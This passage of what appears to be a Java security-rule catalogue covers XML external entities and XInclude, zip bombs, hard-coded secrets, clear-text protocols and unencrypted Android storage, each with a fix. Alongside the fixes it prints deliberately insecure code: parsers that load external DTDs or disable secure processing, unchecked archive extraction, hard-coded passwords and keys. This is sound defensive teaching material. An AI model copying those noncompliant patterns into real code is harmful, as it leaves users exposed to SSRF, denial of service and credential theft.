  • Forbids the use of MD5-related signatures or MAC algorithms
  • Ensures that Reference IDs are unique to help prevent signature wrapping attacks
  • Forbids Reference URIs of type http, https, or file
  • Does not allow a RetrievalMethod element to reference another RetrievalMethod element
  • Forbids RSA or DSA keys less than 1024 bits

Noncompliant code example

NodeList signatureElement = doc.getElementsByTagNameNS(XMLSignature.XMLNS, "Signature");

XMLSignatureFactory fac = XMLSignatureFactory.getInstance("DOM");
DOMValidateContext valContext = new DOMValidateContext(new KeyValueKeySelector(), signatureElement.item(0)); // Noncompliant
XMLSignature signature = fac.unmarshalXMLSignature(valContext);

boolean signatureValidity = signature.validate(valContext);

Compliant solution

In order to benefit from this secure validation mode, set the DOMValidateContext’s org.jcp.xml.dsig.secureValidation property to TRUE.

NodeList signatureElement = doc.getElementsByTagNameNS(XMLSignature.XMLNS, "Signature");

XMLSignatureFactory fac = XMLSignatureFactory.getInstance("DOM");
DOMValidateContext valContext = new DOMValidateContext(new KeyValueKeySelector(), signatureElement.item(0));
valContext.setProperty("org.jcp.xml.dsig.secureValidation", Boolean.TRUE);
XMLSignature signature = fac.unmarshalXMLSignature(valContext);

boolean signatureValidity = signature.validate(valContext);

Resources

java:S6374

This rule is deprecated; use S2755 instead.

Why is this an issue?

By default, XML processors attempt to load all XML schemas and DTDs (their locations are defined with xsi:schemaLocation attributes and DOCTYPE declarations), potentially from external storage such as the file system or network. If no restrictions are put in place, this may lead to server-side request forgery (SSRF) vulnerabilities.

Noncompliant code example

For DocumentBuilder, SAXParser and Schema JAXP factories:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setValidating(true); // Noncompliant
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", true); // Noncompliant

SAXParserFactory factory = SAXParserFactory.newInstance();
factory.setValidating(true); // Noncompliant
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", true); // Noncompliant

SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
schemaFactory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", true); // Noncompliant

For Dom4j library:

SAXReader xmlReader = new SAXReader(); // Noncompliant
xmlReader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", true);  // Noncompliant

For Jdom2 library:

SAXBuilder builder = new SAXBuilder();
builder.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", true); // Noncompliant

Compliant solution

For DocumentBuilder, SAXParser and Schema JAXP factories:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

SAXParserFactory factory = SAXParserFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
schemaFactory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

For Dom4j library:

SAXReader xmlReader = new SAXReader();
xmlReader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

For Jdom2 library:

SAXBuilder builder = new SAXBuilder();
builder.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
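As a runnable illustration of the feature's effect (using only the JDK's built-in Xerces-based parser; the DTD URL is a placeholder), the following sketch parses a document that declares an external DTD. With load-external-dtd disabled, the parser accepts the document without making any file or network request for the DTD:

```java
import java.io.ByteArrayInputStream;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Sketch: the document references an external DTD that is never fetched.
class NoExternalDtd {
    static String parseRootText() {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
            String xml = "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE note SYSTEM \"http://example.invalid/note.dtd\">"
                + "<note>hello</note>";
            Document doc = factory.newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes()));
            return doc.getDocumentElement().getTextContent();
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }
}
```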

Exceptions

This rule does not raise an issue when an EntityResolver is set.

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setValidating(true);
DocumentBuilder builder = factory.newDocumentBuilder();
builder.setEntityResolver(new MyEntityResolver());

SAXBuilder builder = new SAXBuilder();
builder.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", true);
builder.setEntityResolver(new MyEntityResolver());

Resources

java:S6373

Why is this an issue?

The XML standard allows the inclusion of XML files with the XInclude element.

XML processors will replace an XInclude element with the content of the file located at the URI defined in the href attribute, potentially from external storage such as the file system or network. If no restrictions are put in place, this may lead to arbitrary file disclosure or server-side request forgery (SSRF) vulnerabilities.

Noncompliant code example

For DocumentBuilder, SAXParser, XMLInput, Transformer and Schema JAXP factories:

factory.setXIncludeAware(true); // Noncompliant
// or
factory.setFeature("http://apache.org/xml/features/xinclude", true); // Noncompliant

For Dom4j library:

SAXReader xmlReader = new SAXReader();
xmlReader.setFeature("http://apache.org/xml/features/xinclude", true); // Noncompliant

For Jdom2 library:

SAXBuilder builder = new SAXBuilder();
builder.setFeature("http://apache.org/xml/features/xinclude", true); // Noncompliant

Compliant solution

XInclude is disabled by default and can be explicitly disabled as shown below.

For DocumentBuilder, SAXParser, XMLInput, Transformer and Schema JAXP factories:

factory.setXIncludeAware(false);
// or
factory.setFeature("http://apache.org/xml/features/xinclude", false);

For Dom4j library:

SAXReader xmlReader = new SAXReader();
xmlReader.setFeature("http://apache.org/xml/features/xinclude", false);

For Jdom2 library:

SAXBuilder builder = new SAXBuilder();
builder.setFeature("http://apache.org/xml/features/xinclude", false);

Exceptions

This rule does not raise issues when XInclude is enabled with a custom EntityResolver:

For DocumentBuilderFactory:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setXIncludeAware(true);
// ...
DocumentBuilder builder = factory.newDocumentBuilder();
builder.setEntityResolver((publicId, systemId) -> new MySafeEntityResolver(publicId, systemId));

For SAXBuilder:

SAXBuilder builder = new SAXBuilder();
builder.setFeature("http://apache.org/xml/features/xinclude", true);
builder.setEntityResolver((publicId, systemId) -> new MySafeEntityResolver(publicId, systemId));

For SAXReader:

SAXReader xmlReader = new SAXReader();
xmlReader.setFeature("http://apache.org/xml/features/xinclude", true);
xmlReader.setEntityResolver((publicId, systemId) -> new MySafeEntityResolver(publicId, systemId));

For XMLInputFactory:

XMLInputFactory factory = XMLInputFactory.newInstance();
factory.setProperty("http://apache.org/xml/features/xinclude", true);
factory.setXMLResolver(new MySafeEntityResolver());

Resources

java:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data that expands into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers compress highly redundant data (e.g. a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the ratio between compressed and uncompressed data; in general, the data compression ratio for most legitimate archives is 1 to 3.
  • Define and control the threshold for maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if their number is greater than a predefined threshold. In particular, it is not recommended to recursively expand archives (an entry of an archive could itself be an archive).

Sensitive Code Example

File f = new File("ZipBomb.zip");
ZipFile zipFile = new ZipFile(f);
Enumeration<? extends ZipEntry> entries = zipFile.entries(); // Sensitive

while(entries.hasMoreElements()) {
  ZipEntry ze = entries.nextElement();
  File out = new File("./output_onlyfortesting.txt");
  Files.copy(zipFile.getInputStream(ze), out.toPath(), StandardCopyOption.REPLACE_EXISTING);
}

Compliant Solution

Do not rely on getSize() to retrieve the size of an uncompressed entry, because this method returns what is declared in the archive headers, which can be forged by attackers. Instead, calculate the actual entry size while unzipping it:

File f = new File("ZipBomb.zip");
ZipFile zipFile = new ZipFile(f);
Enumeration<? extends ZipEntry> entries = zipFile.entries();

int THRESHOLD_ENTRIES = 10000;
int THRESHOLD_SIZE = 1000000000; // 1 GB
double THRESHOLD_RATIO = 10;
int totalSizeArchive = 0;
int totalEntryArchive = 0;

while(entries.hasMoreElements()) {
  ZipEntry ze = entries.nextElement();
  InputStream in = new BufferedInputStream(zipFile.getInputStream(ze));
  OutputStream out = new BufferedOutputStream(new FileOutputStream("./output_onlyfortesting.txt"));

  totalEntryArchive ++;

  int nBytes = -1;
  byte[] buffer = new byte[2048];
  int totalSizeEntry = 0;

  while((nBytes = in.read(buffer)) > 0) { // Compliant
      out.write(buffer, 0, nBytes);
      totalSizeEntry += nBytes;
      totalSizeArchive += nBytes;

      double compressionRatio = totalSizeEntry / (double) ze.getCompressedSize();
      if(compressionRatio > THRESHOLD_RATIO) {
        // ratio between compressed and uncompressed data is highly suspicious, looks like a Zip Bomb Attack
        break;
      }
  }

  if(totalSizeArchive > THRESHOLD_SIZE) {
      // the uncompressed data size is too much for the application resource capacity
      break;
  }

  if(totalEntryArchive > THRESHOLD_ENTRIES) {
      // too many entries in this archive, which can lead to inode exhaustion on the system
      break;
  }
}
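The same guards can be exercised in a self-contained sketch (thresholds, file names, and class names are illustrative): build a small archive in memory with java.util.zip, then expand it while counting entries and actual uncompressed bytes.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;

// Hedged sketch: expansion guarded by entry-count and total-size thresholds.
class GuardedUnzip {
    static long expand(byte[] zipBytes, int maxEntries, long maxTotalSize) {
        long totalSize = 0;
        int entries = 0;
        try (ZipInputStream zin = new ZipInputStream(new ByteArrayInputStream(zipBytes))) {
            byte[] buffer = new byte[2048];
            while (zin.getNextEntry() != null) {
                if (++entries > maxEntries) throw new IllegalStateException("too many entries");
                int n;
                while ((n = zin.read(buffer)) > 0) {
                    totalSize += n; // count the actual uncompressed bytes
                    if (totalSize > maxTotalSize) throw new IllegalStateException("archive too large");
                }
            }
        } catch (IOException e) {
            throw new IllegalStateException(e);
        }
        return totalSize;
    }

    // Builds a one-entry archive in memory for demonstration.
    static byte[] smallZip() {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ZipOutputStream zos = new ZipOutputStream(bos)) {
            zos.putNextEntry(new ZipEntry("a.txt"));
            zos.write("hello".getBytes());
            zos.closeEntry();
        } catch (IOException e) {
            throw new IllegalStateException(e);
        }
        return bos.toByteArray();
    }
}
```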

See

java:S6376

Why is this an issue?

An XML bomb / billion laughs attack is a malicious XML document containing the same large entity repeated over and over again. If no restriction is in place, such as a limit on the number of entity expansions, the XML processor can consume a lot of memory and time while parsing such documents, leading to denial of service.
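For illustration, here is a miniature (harmless) version of the entity-expansion pattern, parsed with secure processing enabled. The JDK's limits under this feature are generous (64,000 entity expansions by default), so small documents like this still parse, while a real bomb trips the cap and is rejected:

```java
import java.io.ByteArrayInputStream;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Sketch: two-level entity expansion, &lol2; -> &lol;&lol; -> "lollol".
class SecureEntityParse {
    static String expand() {
        try {
            String xml = "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE lolz [<!ENTITY lol \"lol\"><!ENTITY lol2 \"&lol;&lol;\">]>"
                + "<lolz>&lol2;</lolz>";
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
            Document doc = factory.newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes()));
            return doc.getDocumentElement().getTextContent();
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }
}
```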

Noncompliant code example

For DocumentBuilder, SAXParser, Schema and Transformer JAXP factories:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, false); // Noncompliant

SAXParserFactory factory = SAXParserFactory.newInstance();
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, false); // Noncompliant

SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, false); // Noncompliant

TransformerFactory factory = javax.xml.transform.TransformerFactory.newInstance();
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, false); // Noncompliant

For Dom4j library:

SAXReader xmlReader = new SAXReader();
xmlReader.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, false); // Noncompliant

For Jdom2 library:

SAXBuilder builder = new SAXBuilder();
builder.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, false);  // Noncompliant

Compliant solution

For DocumentBuilder, SAXParser, Schema and Transformer JAXP factories:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

SAXParserFactory factory = SAXParserFactory.newInstance();
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

TransformerFactory factory = javax.xml.transform.TransformerFactory.newInstance();
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

For Dom4j library:

SAXReader xmlReader = new SAXReader();
xmlReader.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

For Jdom2 library:

SAXBuilder builder = new SAXBuilder();
builder.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

Resources

java:S1989

Why is this an issue?

Servlets are components in Java web development, responsible for processing HTTP requests and generating responses. In this context, exceptions are used to handle and manage unexpected errors or exceptional conditions that may occur during the execution of a servlet.

Catching exceptions within the servlet allows us to convert them into meaningful, user-friendly messages. Otherwise, failing to catch exceptions will propagate them to the servlet container, where the default error-handling mechanism may impact the overall security and stability of the server.

Possible security problems are:

  1. Vulnerability to denial-of-service attacks: Uncaught exceptions can leave the servlet container in an unstable state, which can exhaust the available resources and make the system unavailable in the worst cases.
  2. Exposure of sensitive information: Exceptions handled by the servlet container, by default, expose detailed error messages or debugging information to the user, which may contain sensitive data such as stack traces, database connection details, or system configuration.

Unfortunately, servlet method signatures do not force developers to handle IOException and ServletException:

public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
}

To prevent this risk, this rule enforces all exceptions to be caught within the "do*" methods of servlet classes.

How to fix it

Surround all method calls that may throw an exception with a try/catch block.

Code examples

In the following example, the getByName method may throw an UnknownHostException.

Noncompliant code example

public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
  InetAddress addr = InetAddress.getByName(request.getRemoteAddr()); // Noncompliant
  //...
}

Compliant solution

public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
  try {
    InetAddress addr = InetAddress.getByName(request.getRemoteAddr());
    //...
  }
  catch (UnknownHostException ex) {  // Compliant
    //...
  }
}

Resources

Articles & blog posts

java:S6288

Android KeyStore is a secure container for storing key materials. In particular, it prevents key material extraction: even when the application process is compromised, the attacker cannot extract keys, but may still be able to use them. It is possible to enable an Android security feature, user authentication, to restrict the usage of keys to authenticated users only. The lock screen has to be unlocked with defined credentials (pattern/PIN/password, biometric).

Ask Yourself Whether

  • The application requires prohibiting the use of keys in case of compromise of the application process.
  • The key material is used in the context of a highly sensitive application, like an e-banking mobile app.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to enable user authentication (by setting setUserAuthenticationRequired to true during key generation) and to limit the duration for which keys can be used (by setting appropriate values with setUserAuthenticationValidityDurationSeconds), after which the user must re-authenticate.

Sensitive Code Example

Any user can use the key:

KeyGenerator keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, "AndroidKeyStore");

KeyGenParameterSpec builder = new KeyGenParameterSpec.Builder("test_secret_key_noncompliant", KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT) // Noncompliant
    .setBlockModes(KeyProperties.BLOCK_MODE_GCM)
    .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
    .build();

keyGenerator.init(builder);

Compliant Solution

The use of the key is limited to authenticated users (for a duration of time defined to 60 seconds):

KeyGenerator keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, "AndroidKeyStore");

KeyGenParameterSpec builder = new KeyGenParameterSpec.Builder("test_secret_key", KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)
    .setBlockModes(KeyProperties.BLOCK_MODE_GCM)
    .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
    .setUserAuthenticationRequired(true)
    .setUserAuthenticationParameters(60, KeyProperties.AUTH_DEVICE_CREDENTIAL)
    .build();

keyGenerator.init(builder);

See

java:S6291

Storing data locally is a common task for mobile applications. Such data includes preferences or authentication tokens for external services, among other things. There are many convenient solutions that allow storing data persistently, for example SQLiteDatabase, SharedPreferences, and Realm. By default these systems store the data unencrypted, thus an attacker with physical access to the device can read them out easily. Access to sensitive data can be harmful for the user of the application, for example when the device gets stolen.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to password-encrypt local databases that contain sensitive information. Most systems provide secure alternatives to plain-text storage that should be used. If no secure alternative is available the data can also be encrypted manually before it is stored.

The encryption password should not be hard-coded in the application. There are different approaches to how the password can be provided to encrypt and decrypt the database. In the case of EncryptedSharedPreferences, the Android Keystore can be used to store the password. Other databases can rely on EncryptedSharedPreferences to store passwords. The password can also be provided dynamically by the user of the application, or it can be fetched from a remote server if the other methods are not feasible.

Sensitive Code Example

For SQLiteDatabase:

SQLiteDatabase db = activity.openOrCreateDatabase("test.db", Context.MODE_PRIVATE, null); // Sensitive

For SharedPreferences:

SharedPreferences pref = activity.getPreferences(Context.MODE_PRIVATE); // Sensitive

For Realm:

RealmConfiguration config = new RealmConfiguration.Builder().build();
Realm realm = Realm.getInstance(config); // Sensitive

Compliant Solution

Instead of SQLiteDatabase you can use SQLCipher:

SQLiteDatabase db = SQLiteDatabase.openOrCreateDatabase("test.db", getKey(), null);

Instead of SharedPreferences you can use EncryptedSharedPreferences:

String masterKeyAlias = MasterKeys.getOrCreate(MasterKeys.AES256_GCM_SPEC);
EncryptedSharedPreferences.create(
    "secret",
    masterKeyAlias,
    context,
    EncryptedSharedPreferences.PrefKeyEncryptionScheme.AES256_SIV,
    EncryptedSharedPreferences.PrefValueEncryptionScheme.AES256_GCM
);

For Realm an encryption key can be specified in the config:

RealmConfiguration config = new RealmConfiguration.Builder()
    .encryptionKey(getKey())
    .build();
Realm realm = Realm.getInstance(config);

See

java:S6293

Android comes with Android KeyStore, a secure container for storing key materials. It’s possible to define certain keys to be unlocked when users authenticate using biometric credentials. This way, even if the application process is compromised, the attacker cannot access keys, as the presence of the authorized user is required.

These keys can be used to encrypt, sign, or create a message authentication code (MAC) as proof that the authentication result has not been tampered with. This protection defeats the scenario where an attacker with physical access to the device tries to hook into the application process and call the onAuthenticationSucceeded method directly. They would therefore be unable to extract the sensitive data or perform the critical operations protected by the biometric authentication.

Ask Yourself Whether

The application contains:

  • Cryptographic keys / sensitive information that need to be protected using biometric authentication.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to tie the biometric authentication to a cryptographic operation by using a CryptoObject during authentication.

Sensitive Code Example

A CryptoObject is not used during authentication:

// ...
BiometricPrompt biometricPrompt = new BiometricPrompt(activity, executor, callback);
// ...
biometricPrompt.authenticate(promptInfo); // Noncompliant

Compliant Solution

A CryptoObject is used during authentication:

// ...
BiometricPrompt biometricPrompt = new BiometricPrompt(activity, executor, callback);
// ...
biometricPrompt.authenticate(promptInfo, new BiometricPrompt.CryptoObject(cipher)); // Compliant

See

java:S6301

Why is this an issue?

Storing data locally is a common task for mobile applications. There are many convenient solutions that allow storing data persistently, for example SQLiteDatabase and Realm. These systems can be initialized with a secret key in order to store the data encrypted.

The encryption key is meant to stay secret and should not be hard-coded in the application, as that would mean:

  • All users would use the same encryption key.
  • The encryption key would be known by anyone who has access to the source code or the application binary.
  • Data stored encrypted in the database would not be protected.

There are different approaches to how the key can be provided to encrypt and decrypt the database. One of the most convenient ways is to rely on EncryptedSharedPreferences to store encryption keys. The key can also be provided dynamically by the user of the application or fetched from a remote server.

Noncompliant code example

SQLCipher

String key = "gb09ym9ydoolp3w886d0tciczj6ve9kszqd65u7d126040gwy86xqimjpuuc788g";
SQLiteDatabase db = SQLiteDatabase.openOrCreateDatabase("test.db", key, null); // Noncompliant

Realm

String key = "gb09ym9ydoolp3w886d0tciczj6ve9kszqd65u7d126040gwy86xqimjpuuc788g";
RealmConfiguration config = new RealmConfiguration.Builder()
    .encryptionKey(key.getBytes()) // Noncompliant
    .build();
Realm realm = Realm.getInstance(config);

Compliant solution

SQLCipher

SQLiteDatabase db = SQLiteDatabase.openOrCreateDatabase("test.db", getKey(), null);

Realm

RealmConfiguration config = new RealmConfiguration.Builder()
    .encryptionKey(getKey())
    .build();
Realm realm = Realm.getInstance(config);

Resources

java:S2068

Because it is easy to extract strings from an application source code or binary, passwords should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Passwords should be stored outside of the code in a configuration file, a database, or a password management service.

This rule flags instances of hard-coded passwords used in database and LDAP connections. It looks for hard-coded passwords in connection strings, and for variable names that match any of the patterns from the provided list.

Ask Yourself Whether

  • The password allows access to a sensitive component like a database, a file storage, an API, or a service.
  • The password is used in production environments.
  • Application re-distribution is required before updating the password.

There would be a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

String username = "steve";
String password = "blue";
Connection conn = DriverManager.getConnection("jdbc:mysql://localhost/test?" +
                  "user=" + username + "&password=" + password); // Sensitive

Compliant Solution

String username = getEncryptedUser();
String password = getEncryptedPassword();
Connection conn = DriverManager.getConnection("jdbc:mysql://localhost/test?" +
                  "user=" + username + "&password=" + password);

See

java:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. This means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications decreases the chances that attackers successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application follows the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

These clients from the Apache Commons Net library are based on unencrypted protocols and are not recommended:

TelnetClient telnet = new TelnetClient(); // Sensitive

FTPClient ftpClient = new FTPClient(); // Sensitive

SMTPClient smtpClient = new SMTPClient(); // Sensitive

Unencrypted HTTP connections, when using okhttp library for instance, should be avoided:

ConnectionSpec spec = new ConnectionSpec.Builder(ConnectionSpec.CLEARTEXT) // Sensitive
  .build();

Android WebView can be configured to allow a secure origin to load content from any other origin, even if that origin is insecure (mixed content):

import android.webkit.WebView

WebView webView = findViewById(R.id.webview)
webView.getSettings().setMixedContentMode(MIXED_CONTENT_ALWAYS_ALLOW); // Sensitive

Compliant Solution

Use these clients from the Apache Commons Net and JSch libraries instead:

JSch jsch = new JSch();

if(implicit) {
  // implicit mode is considered deprecated but offers the same security as explicit mode
  FTPSClient ftpsClient = new FTPSClient(true);
}
else {
  FTPSClient ftpsClient = new FTPSClient();
}

if(implicit) {
  // implicit mode is considered deprecated but offers the same security as explicit mode
  SMTPSClient smtpsClient = new SMTPSClient(true);
}
else {
  SMTPSClient smtpsClient = new SMTPSClient();
  smtpsClient.connect("127.0.0.1", 25);
  if (smtpsClient.execTLS()) {
    // commands
  }
}

Perform HTTP encrypted connections, with okhttp library for instance:

ConnectionSpec spec = new ConnectionSpec.Builder(ConnectionSpec.MODERN_TLS)
  .build();

The most secure mode for Android WebView is MIXED_CONTENT_NEVER_ALLOW:

import android.webkit.WebView

WebView webView = findViewById(R.id.webview)
webView.getSettings().setMixedContentMode(MIXED_CONTENT_NEVER_ALLOW);

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.
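This exception can be sketched as a small policy check that rejects clear-text schemes unless the host is a loopback address (the helper name and scheme list are illustrative, not part of the rule):

```java
import java.net.URI;
import java.util.Set;

public class ClearTextPolicy {
    private static final Set<String> CLEAR_TEXT = Set.of("http", "ftp", "telnet");

    // Returns true when the URI is acceptable: either an encrypted scheme,
    // or a clear-text scheme pointing at the local loopback only.
    public static boolean isAllowed(URI uri) {
        String scheme = uri.getScheme() == null ? "" : uri.getScheme().toLowerCase();
        if (!CLEAR_TEXT.contains(scheme)) {
            return true;
        }
        String host = uri.getHost();
        return "127.0.0.1".equals(host) || "localhost".equals(host);
    }
}
```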

See

java:S6300

Storing files locally is a common task for mobile applications. Files that are stored unencrypted can be read out and modified by an attacker with physical access to the device. Access to sensitive data can be harmful for the user of the application, for example when the device gets stolen.

Ask Yourself Whether

  • The file contains sensitive data that could cause harm when leaked.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to password-encrypt local files that contain sensitive information. The class EncryptedFile can be used to easily encrypt files.

Sensitive Code Example

Files.write(path, content); // Sensitive

FileOutputStream out = new FileOutputStream(file); // Sensitive

FileWriter fw = new FileWriter("outfilename", false); // Sensitive

Compliant Solution

String masterKeyAlias = MasterKeys.getOrCreate(MasterKeys.AES256_GCM_SPEC);

File file = new File(context.getFilesDir(), "secret_data");
EncryptedFile encryptedFile = new EncryptedFile.Builder(
    file,
    context,
    masterKeyAlias,
    EncryptedFile.FileEncryptionScheme.AES256_GCM_HKDF_4KB
).build();

// write to the encrypted file
FileOutputStream encryptedOutputStream = encryptedFile.openFileOutput();

See

java:S5693

Rejecting requests with significant content length is a good practice to control network traffic intensity, and thus resource consumption, in order to prevent DoS attacks.

Ask Yourself Whether

  • size limits are not defined for the different resources of the web application.
  • the web application is not protected by rate limiting features.
  • the web application infrastructure has limited resources.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • For most of the features of an application, it is recommended to limit the size of requests to:
    • lower than or equal to 8 MB for file uploads.
    • lower than or equal to 2 MB for other requests.

It is recommended to customize the rule with the limit values that correspond to the web application.
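The thresholds above translate into the byte values used in this rule's Spring configuration examples (1 MB = 1 048 576 bytes); a small sketch of the arithmetic:

```java
public class UploadLimits {
    // 8 MB for file uploads and 2 MB for other requests, expressed in bytes.
    public static final long MAX_UPLOAD_BYTES  = 8L * 1024 * 1024; // 8388608
    public static final long MAX_REQUEST_BYTES = 2L * 1024 * 1024; // 2097152
}
```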

Sensitive Code Example

With the default limit value of 8388608 bytes (8 MB).

A 100 MB file is allowed to be uploaded:

@Bean(name = "multipartResolver")
public CommonsMultipartResolver multipartResolver() {
  CommonsMultipartResolver multipartResolver = new CommonsMultipartResolver();
  multipartResolver.setMaxUploadSize(104857600); // Sensitive (100MB)
  return multipartResolver;
}

@Bean(name = "multipartResolver")
public CommonsMultipartResolver multipartResolver() {
  CommonsMultipartResolver multipartResolver = new CommonsMultipartResolver(); // Sensitive, by default if maxUploadSize property is not defined, there is no limit and thus it's insecure
  return multipartResolver;
}

@Bean
public MultipartConfigElement multipartConfigElement() {
  MultipartConfigFactory factory = new MultipartConfigFactory(); // Sensitive, no limit by default
  return factory.createMultipartConfig();
}

Compliant Solution

File upload size is limited to 8 MB:

@Bean(name = "multipartResolver")
public CommonsMultipartResolver multipartResolver() {
  CommonsMultipartResolver multipartResolver = new CommonsMultipartResolver();
  multipartResolver.setMaxUploadSize(8388608); // Compliant (8 MB)
  return multipartResolver;
}

See

java:S6437

Why is this an issue?

A hard-coded secret has been found in your code. You should quickly list where this secret is used, revoke it, and then change it in every system that uses it.

Passwords, secrets, and any type of credentials should only be used to authenticate a single entity (a person or a system).

If you allow third parties to authenticate as another system or person, they can impersonate legitimate identities and undermine trust within the organization.
